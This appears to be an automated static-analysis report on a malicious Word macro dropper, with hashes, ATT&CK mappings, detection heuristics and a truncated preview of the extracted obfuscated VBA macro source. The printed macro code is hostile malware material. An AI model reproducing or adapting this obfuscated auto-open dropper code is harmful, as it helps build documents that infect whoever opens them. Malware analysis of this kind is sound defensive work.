Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ced0b93ab8cced7b…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 158.0 KB
Created: 2018-02-27 13:33:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 4841f25172373a2a0a0ac501fef20c42
SHA-1: 195f185fbee91b028e0d1a86cee8933c41f83973
SHA-256: ced0b93ab8cced7b438bca6630193ecbc0667d93a2e953679eba29c5dd731a83
Risk Score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The presence of the 'AutoOpen' macro and the ClamAV detection signature 'Doc.Dropper.Agent-6458239-0' strongly suggest this document is a dropper designed to download and execute a secondary payload. No specific family could be identified due to obfuscation.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6458239-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6458239-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 52700 bytes
SHA-256: a0d9fcc766ad49cfd59dc1df282fdf745f29040dd92bf71b7eb581e3720287dd
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 20 long base64-like blob(s))

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ECwhVJPZLdWr"
Sub ZrjYj()
   On Error Resume Next
   Do While wiibwIThzE Xor tzAsNwVaFM
      Dim LcAfUprH
      Do While iZFFBab Or YCbRV
         kXrIMuOzbRiW = 6025 - Atn(aRodq / CByte(7) + ssTuurmUTCDkz + Hex(rQHchfMzkwnXi)) + (171376742 / AkkYladsQ) * (5938624 * ChrW(520437311) + wQZauvXjjj * KKLwLdu)
      Loop
      UGXMOU = 6025 - Atn(RizYMwzdjQF / CByte(7) + DoaGowNqZYba + Hex(jlwWYELFKdthKT)) + (171376742 / LjfjFrq) * (5938624 * ChrW(520437311) + tzjOAiJt * ZbdNC)
      Do
         HMujsL = ZdfBittvUFs * CDate(426718607 * Atn(CWpqLbBk - Fix(HjpzIZXULKzIM * CDate(8832))) * GizzQAHEWk / CLng(5390)) / 9 - ChrB(8 - Cos(911)) / 83 + Int(AkRViFraqRuqBW) / VaIuvJpw - ChrB(872) / HMclkiDMEEH + Chr(778 / Atn(48 * Round(FwcFFhVILrzd / CBool(2)))) / (1199 / CByte(ihwbplKniOWdGq * 8 + OhlzOi * CDbl(39)))
      Loop Until bfppcUnX <= OwoFBGkP
      zCXkGbzr = uiGzORO + QmzIqz
   Loop
   Set wHiSkGH = WiQcsrZNqlGttJ
End Sub
Function MRzCmzhWsHPu()
On Error Resume Next
QKJpJw = "rMikSIzKvu% tes&&wo=%2rav%iVijMPwvBkRZpizw"
krBWdP = jAMIMPLpa = 6025 - Atn(vnbDWAzIuv / CByte(7) + VDbDXdFM + Hex(cUvdiEFfPSjk)) + (171376742 / ocOuw) * (5938624 * ChrW(520437311) + PrYMZ * LzkEo)
nlcnoHKNzzw = FdqAbrwVRuTt = 6025 - Atn(OiSOzocjEw / CByte(7) + DHVaWHVabjbHM + Hex(AWwbjUYflKTt)) + (171376742 / kQLFAjzzTVX) * (5938624 * ChrW(520437311) + KZsSunbFbwSjFU * UYWLHdZkKP)
XJdLij = iuivbdfghnkjgyugjn(QKJpJw, 17, 17)
ijkHl = "sclkN tes&&qzMRWicctWksHBSaiqiSutXwuGQYnhKHlr"
YPiiCWtquvL = XlYnOSXzj = 6025 - Atn(rURqSjEU / CByte(7) + bzUGarzGcZt + Hex(dfMEIzzDRSJbVO)) + (171376742 / uisJsBnFaC) * (5938624 * ChrW(520437311) + zvOLvZnVOpE * JiFRPIntkMOF)
lmohHdSwI = jPAvpamBd = 6025 - Atn(DoGXj / CByte(7) + AAnpwibnjXzn + Hex(vkjJnL)) + (171376742 / mZYPSk) * (5938624 * ChrW(520437311) + iBcJlEFkLbP * AoNLRczshP)
PpZUQBcZZuw = iuivbdfghnkjgyugjn(ijkHl, 35, 6)
dRJKKUKjLO = "BcvrrivsXDJIYv%!!%8rav%MNawJk"
nrcYolVz = TCYIJ = 6025 - Atn(lEBBoCBtL / CByte(7) + wJCVDEccL + Hex(iZZZzOQ)) + (171376742 / zwXTvjiLmVBP) * (5938624 * ChrW(520437311) + PpjhDTQAOaw * wpMicEalMvOAdN)
ojpLzcvUSl = qrRHbvdSj = 6025 - Atn(rtvzoiWbWzrSj / CByte(7) + QbdXTaf + Hex(pzaIz)) + (171376742 / VBSWckkK) * (5938624 * ChrW(520437311) + mYMsZHOdYK * qzRGzJ)
OVUivZiNRZ = iuivbdfghnkjgyugjn(dRJKKUKjLO, 7, 10)
nCljSJLSO = "WMHZzzOJvV6raSXDtMiZfBOJiwSfcAZdH"
ksobRw = ftmJsL = 6025 - Atn(jJqSJEir / CByte(7) + DcCpMjL + Hex(COJNpBknvCM)) + (171376742 / WikSEzllSbO) * (5938624 * ChrW(520437311) + iMaXMosz * EHiBFtHFiNC)
CZKumzI = IqVrklOu = 6025 - Atn(PazqicbNa / CByte(7) + JNASbG + Hex(wDdjnNMB)) + (171376742 / WFfcDiEHo) * (5938624 * ChrW(520437311) + iLXRjrDGsEH * tlTmKRtcN)
pcUbJQq = iuivbdfghnkjgyugjn(nCljSJLSO, 21, 3)
RacFA = "tKtDZAFmsAhTVoHTEzS=%wJZnficvYuTGUVUJmAYIm"
kOAQqJVln = GvSJTNYiMBCUO = 6025 - Atn(CajbVXju / CByte(7) + jZNzNswEuDzjPD + Hex(zOMDEZjKQ)) + (171376742 / EaQctNMLzijFN) * (5938624 * ChrW(520437311) + lOzHRQj * WOcGKcqWzOzK)
VVfYc = SibBpl = 6025 - Atn(QUltABSp / CByte(7) + btzGRDCAmC + Hex(VdiUIDBTjVG)) + (171376742 / fOVBciGIKA) * (5938624 * ChrW(520437311) + YVzDrOjbOmCwm * QlwAwJHVQUsw)
JdXALSwQ = iuivbdfghnkjgyugjn(RacFA, 8, 17)
GSUBP = "YXYKnBmOaav% oz"
ZOmQWC = PstkJwwmfotWN = 6025 - Atn(ShZYdmih / CByte(7) + rpLISwFTY + Hex(GaAPdUisqhwVz)) + (171376742 / RszYiQ) * (5938624 * ChrW(520437311) + HhSCuzojoaUVcG * RSwEwtrAbWrBq)
OljlQ = BhkIzwsiN = 6025 - Atn(XqMCHdzVDZa / CByte(7) + biRBPhrfCw + Hex(HmtjNdIAjENjHh)) + (171376742 / tzXWwRwWFGqzj) * (5938624 * ChrW(520437311) + qhjbsEP * umruYra)
SdvnmkEb = iuivbdfghnkjgyugjn(GSUBP, 3, 4)
WhBFznJ = "qafijtjS&&!%2rav%!=%ZZYIWauNj"
UHWmbl = PSvwh = 6025 - Atn(CjcEmUShII / CByte(7) + KQnmKMGBziXud + Hex(vaLGQCEzPr)) + (171376742 / XEDDiMf) * (5938624 * ChrW(520437311
... (truncated)